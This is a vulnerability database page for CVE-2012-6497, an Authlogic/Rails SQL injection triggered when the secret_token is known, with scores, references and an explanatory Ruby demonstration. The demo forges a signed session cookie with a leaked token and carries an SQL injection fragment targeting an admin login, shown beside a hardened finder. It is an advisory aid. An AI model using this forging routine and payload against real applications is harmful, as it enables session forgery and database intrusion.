Vulnerability Details : CVE-2012-6497
The Authlogic gem for Ruby on Rails, when used with certain Rails versions before 3.2.10, makes potentially unsafe find_by_id method calls, which might allow remote attackers to conduct the SQL injection attacks described in CVE-2012-6496 via a crafted parameter in environments where the secret_token value is known, as demonstrated by a value contained in secret_token.rb in an open-source product.
Vulnerability category: SQL Injection
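The two preconditions in the description (a leaked secret_token and a dynamic finder that accepts a Hash) are easier to reason about side by side. The Ruby below is an added example, not code from Authlogic, Rails or any of the referenced posts: it reproduces the Rails 3 cookie-store signing scheme (Base64 of Marshal.dump plus an HMAC-SHA1 over the secret_token), shows that anyone holding the token can sign a session whose id slot is a Hash rather than an integer, and runs that value through a simplified model of the pre-3.2.10 `find_by_id` option handling next to a hardened caller that refuses non-scalar ids. The token value, the `users` table, the `user_credentials_id` session key and the SQL fragment are all constructed for the demonstration; the vulnerable finder is a model of the documented behaviour, not Rails' own code.

```ruby
require 'openssl'

# Constructed stand-in for a secret_token that has been committed to a public
# repository (hypothetical value; a real Rails 3 token is 128 hex characters).
LEAKED_SECRET_TOKEN = '0123456789abcdef' * 8

# Rails 3.x cookie-store layout: Base64(Marshal.dump(session)) + "--" + hex HMAC-SHA1(secret_token).
def sign_session(session, secret)
  data = [Marshal.dump(session)].pack('m0')
  "#{data}--#{OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)}"
end

# Constant-time MAC comparison, so the verifier does not leak the digest byte by byte.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side: returns the session Hash for a correctly signed cookie, nil otherwise.
# The MAC proves only that the signer knew the secret; with a leaked secret the
# attacker can therefore make the server deserialise any object graph it likes.
def load_session(cookie, secret)
  data, mac = cookie.split('--', 2)
  return nil if data.nil? || mac.nil?
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
  return nil unless constant_time_equal?(mac, expected)
  Marshal.load(data.unpack1('m0'))
end

def quote(value)
  "'#{value.to_s.gsub("'", "''")}'"
end

# Simplified model of the pre-3.2.10 dynamic finder (not Rails' own code): a
# Hash argument was peeled off as finder *options*, so find_by_id(:select => x)
# interpolated x into the SELECT list and compared id against nothing.
def vulnerable_find_by_id_sql(id)
  if id.is_a?(Hash)
    "SELECT #{id[:select] || '*'} FROM users WHERE users.id IS NULL LIMIT 1"
  else
    "SELECT * FROM users WHERE users.id = #{quote(id)} LIMIT 1"
  end
end

# Hardened caller: refuse anything but a scalar id before it reaches the finder,
# and always quote the value. Upgrading Rails fixes the finder itself; this check
# is the defence an application can add regardless of the framework version.
def hardened_find_by_id_sql(id)
  unless id.is_a?(String) || id.is_a?(Integer)
    raise ArgumentError, "session id must be a String or Integer, got #{id.class}"
  end
  "SELECT * FROM users WHERE users.id = #{quote(id)} LIMIT 1"
end

# Attacker who knows the token signs a session whose user id slot holds a Hash
# instead of an integer. The key name follows Authlogic's session convention
# (assumed here); the SQL fragment is constructed for the demonstration.
FORGED_COOKIE = sign_session(
  { 'user_credentials_id' => { select: "* FROM users WHERE login = 'admin' --" } },
  LEAKED_SECRET_TOKEN
)

# Runs both finders on the id recovered from the forged cookie.
def demo
  id = load_session(FORGED_COOKIE, LEAKED_SECRET_TOKEN)['user_credentials_id']
  hardened = begin
    hardened_find_by_id_sql(id)
  rescue ArgumentError
    :rejected
  end
  [vulnerable_find_by_id_sql(id), hardened]
end

if __FILE__ == $PROGRAM_NAME
  vulnerable, hardened = demo
  puts "vulnerable finder: #{vulnerable}"
  puts "hardened finder:   #{hardened}"
end
```

The point to take from running it: the cookie MAC is intact, so the server has no way to tell the forged session from a genuine one; the only protections are keeping secret_token out of version control (and rotating it if it ever leaked) and making sure values that originate in a client-controlled session are type-checked before they reach a finder.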
Threat overview for CVE-2012-6497
Top countries where our scanners detected CVE-2012-6497
Top open port discovered on systems with this issue: 80
IPs affected by CVE-2012-6497: 69
Threat actors abusing this issue? Yes
Exploit prediction scoring system (EPSS) score for CVE-2012-6497
Probability of exploitation activity in the next 30 days: 0.13%
Percentile (proportion of vulnerabilities scored at or below this value): ~48%
CVSS scores for CVE-2012-6497
Base Score | Base Severity | CVSS Vector (v2) | Exploitability Score | Impact Score | Score Source |
---|---|---|---|---|---|
5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N | 10.0 | 2.9 | NIST |
CWE ids for CVE-2012-6497
- The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Assigned by: nvd@nist.gov (Primary)
References for CVE-2012-6497
- http://openwall.com/lists/oss-security/2013/01/03/12
  oss-security - Re: SQL Injection Vulnerability in Ruby on Rails (CVE-2012-5664) (Mailing List; Third Party Advisory)
- http://phenoelit.org/blog/archives/2012/12/21/let_me_github_that_for_you/index.html
  Let Me Github That For You | Lands of Packets (Broken Link; Exploit)
- http://www.securityfocus.com/bid/57084
  Ruby on Rails Multiple SQL Injection Vulnerabilities (Broken Link; Third Party Advisory; VDB Entry)
- http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/
  Rails SQL injection vulnerability: hold your horses, here are the facts (title taken from the URL; the page served a "Database Error" when it was indexed) (Exploit)
Products affected by CVE-2012-6497
- cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
Only Rails carries a CPE entry here; the Authlogic gem named in the description is not listed, so product matching on CPE alone will not flag applications by their Authlogic dependency.